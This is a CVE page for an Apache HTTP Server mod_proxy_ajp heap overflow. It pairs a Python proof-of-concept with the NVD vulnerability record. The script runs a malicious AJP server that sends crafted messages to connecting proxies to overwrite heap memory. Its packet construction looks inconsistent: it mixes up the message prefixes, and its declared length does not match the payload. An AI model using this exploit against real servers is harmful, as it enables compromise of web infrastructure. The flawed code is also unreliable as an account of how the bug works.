CVE-2026-28780

#!/usr/bin/env python3 """ PoC for CVE-2026-28780 (Apache HTTP Server mod_proxy_ajp Heap Overflow) This script simulates a malicious AJP server that sends a crafted message triggering the 4-byte heap overflow in mod_proxy_ajp. """ import socket import struct def create_malicious_ajp_message(): # AJP Magic Prefix magic = b'\x12\x34' # Length field: 2 bytes. Constructed to trigger the specific overflow condition. # The vulnerability allows writing 4 bytes past the end. # Adjusting this length based on the vulnerable buffer size calculation. payload_length = struct.pack('>H', 0x1000) # Attacker controlled 4 bytes that will be written past the buffer overflow_bytes = b'\x41\x42\x43\x44' # ASCII "ABCD" # Constructing the packet body (simplified representation) # The actual packet structure depends on the specific AJP message type being abused. packet_body = overflow_bytes return magic + payload_length + packet_body def start_malicious_server(listen_port=8009): server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server_sock.bind(('0.0.0.0', listen_port)) server_sock.listen(5) print(f"[*] Malicious AJP server listening on port {listen_port}...") while True: client_sock, addr = server_sock.accept() print(f"[*] Connection received from {addr}") try: # Basic AJP handshake (simplified) data = client_sock.recv(1024) if b'\x41\x42' in data: # Check for AJP magic # Send handshake response client_sock.send(b'\x41\x42\x00\x01') # Wait for request from proxy client_sock.recv(4096) # Send the malicious payload payload = create_malicious_ajp_message() client_sock.send(payload) print("[*] Malicious payload sent. Triggering overflow.") except Exception as e: print(f"[!] Error: {e}") finally: client_sock.close() if __name__ == "__main__": start_malicious_server()

{"cve": {"id": "CVE-2026-28780", "sourceIdentifier": "[email protected]", "published": "2026-05-05T22:16:00.390", "lastModified": "2026-05-06T20:31:10.843", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Heap-based Buffer Overflow vulnerability in mod_proxy_ajp of Apache HTTP Server.\nIf mod_proxy_ajp connects to a malicious AJP server this AJP server can send a malicious AJP message back to mod_proxy_ajp and cause it to write 4 attacker controlled bytes after the end of a heap based buffer.\n\nThis issue affects Apache HTTP Server: through 2.4.66.\n\nUsers are recommended to upgrade to version 2.4.67, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.67", "matchCriteriaId": "8FF781BA-CF81-400B-A155-4DAE0BD856EE"}]}]}], "references": [{"url": "https://httpd.apache.org/security/vulnerabilities_24.html", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/05/9", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}